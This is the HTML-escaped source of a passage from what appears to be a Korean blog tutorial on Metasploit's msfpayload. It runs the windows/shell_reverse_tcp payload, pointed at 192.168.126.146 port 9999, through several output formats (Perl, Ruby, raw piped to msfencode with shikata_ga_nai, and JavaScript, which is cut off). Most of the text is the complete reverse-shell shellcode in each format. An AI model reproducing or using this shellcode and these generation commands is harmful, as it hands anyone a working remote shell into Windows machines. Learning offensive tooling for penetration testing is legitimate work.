&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x68\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80&quot;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0in; FONT-FAMILY: Consolas; FONT-SIZE: 10pt&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5&quot;;&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;FONT color=#e31600&gt;P&lt;/FONT&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# windows/shell_reverse_tcp - 314 bytes&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# &lt;/SPAN&gt;&lt;A href=&quot;http://www.metasploit.com/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;http://www.metasploit.com&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# VERBOSE=false, LHOST=192.168.126.146, LPORT=9999, &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# ReverseConnectRetries=5, EXITFUNC=process, &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# InitialAutoRunScript=, AutoRunScript=&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;my $buf = &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72&quot; .&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x6f\x6a\x00\x53\xff\xd5&quot;;&lt;/SPAN&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;y&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# windows/shell_reverse_tcp - 314 bytes&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# &lt;/SPAN&gt;&lt;A href=&quot;http://www.metasploit.com/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;http://www.metasploit.com&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# VERBOSE=false, LHOST=192.168.126.146, LPORT=9999, &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# ReverseConnectRetries=5, EXITFUNC=process, &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;# InitialAutoRunScript=, AutoRunScript=&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;buf = &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x6f\x6a\x00\x53\xff\xd5&quot;&lt;/SPAN&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;R&lt;/SPAN&gt;&lt;/FONT&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt; | msfencode -b '\x00'&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;buf = &lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xb8\x9e\x0b\x64\x4f\xdb\xdf\xd9\x74\x24\xf4\x5b\x33\xc9&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xb1\x4f\x83\xc3\x04\x31\x43\x10\x03\x43\x10\x7c\xfe\x98&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xa7\x09\x01\x61\x38\x69\x8b\x84\x09\xbb\xef\xcd\x38\x0b&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x7b\x83\xb0\xe0\x29\x30\x42\x84\xe5\x37\xe3\x22\xd0\x76&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xf4\x83\xdc\xd5\x36\x82\xa0\x27\x6b\x64\x98\xe7\x7e\x65&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xdd\x1a\x70\x37\xb6\x51\x23\xa7\xb3\x24\xf8\xc6\x13\x23&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x40\xb0\x16\xf4\x35\x0a\x18\x25\xe5\x01\x52\xdd\x8d\x4d&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x43\xdc\x42\x8e\xbf\x97\xef\x64\x4b\x26\x26\xb5\xb4\x18&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x06\x19\x8b\x94\x8b\x60\xcb\x13\x74\x17\x27\x60\x09\x2f&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xfc\x1a\xd5\xba\xe1\xbd\x9e\x1c\xc2\x3c\x72\xfa\x81\x33&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x3f\x89\xce\x57\xbe\x5e\x65\x63\x4b\x61\xaa\xe5\x0f\x45&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x6e\xad\xd4\xe4\x37\x0b\xba\x19\x27\xf3\x63\xbf\x23\x16&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x77\xb9\x69\x7f\xb4\xf7\x91\x7f\xd2\x80\xe2\x4d\x7d\x3a&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x6d\xfe\xf6\xe4\x6a\x01\x2d\x50\xe4\xfc\xce\xa0\x2c\x3b&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x9a\xf0\x46\xea\xa3\x9b\x96\x13\x76\x0b\xc7\xbb\x29\xeb&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xb7\x7b\x9a\x83\xdd\x73\xc5\xb3\xdd\x59\x70\xf4\x4a\xa2&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x2b\x84\x18\x4a\x2e\x78\x3a\x84\xa7\x9e\x2e\x8a\xe1\x09&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xc7\x33\xa8\xc1\x76\xbb\x66\x41\x1a\x2e\xed\x91\x55\x53&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xba\xc6\x32\xa5\xb3\x82\xae\x9c\x6d\xb0\x32\x78\x55\x70&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xe9\xb9\x58\x79\x7c\x85\x7e\x69\xb8\x06\x3b\xdd\x14\x51&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x95\x8b\xd2\x0b\x57\x65\x8d\xe0\x31\xe1\x48\xcb\x81\x77&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x55\x06\x74\x97\xe4\xff\xc1\xa8\xc9\x97\xc5\xd1\x37\x08&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x29\x08\xfc\x38\x60\x10\x55\xd1\x2d\xc1\xe7\xbc\xcd\x3c&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\x2b\xb9\x4d\xb4\xd4\x3e\x4d\xbd\xd1\x7b\xc9\x2e\xa8\x14&quot; +&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&quot;\xbc\x50\x1f\x14\x95&quot;&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br /&gt;
&lt;br /&gt;R 옵션은&amp;nbsp;Raw 형태로 출력하라는 옵션이라서 인코딩을 하지 않으면 아래와 같이 나옵니다.&lt;br /&gt;
&lt;br /&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile8.uf.tistory.com/original/1834233F4F0E67A1134E29&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile8.uf.tistory.com/image/1834233F4F0E67A1134E29&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;msfpayload_R.png&quot; height=&quot;485&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;TABLE style=&quot;BORDER-COLLAPSE: collapse&quot; cellSpacing=1 cellPadding=1 width=700 bgColor=#ffffff&gt;
&lt;TBODY&gt;
&lt;TR&gt;
&lt;TD style=&quot;BORDER-BOTTOM: #dadada 1px solid; BORDER-LEFT: #dadada 1px solid; BORDER-TOP: #dadada 1px solid; BORDER-RIGHT: #dadada 1px solid&quot; width=&quot;100%&quot;&gt;
&lt;P&gt;&lt;A href=&quot;mailto:root@LUCKYSTRIKE&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;root@LUCKYSTRIKE&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 &lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;J&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Courier New&quot;&gt;// windows/shell_reverse_tcp - 314 bytes&lt;/SPAN&gt;&lt;br /&gt;
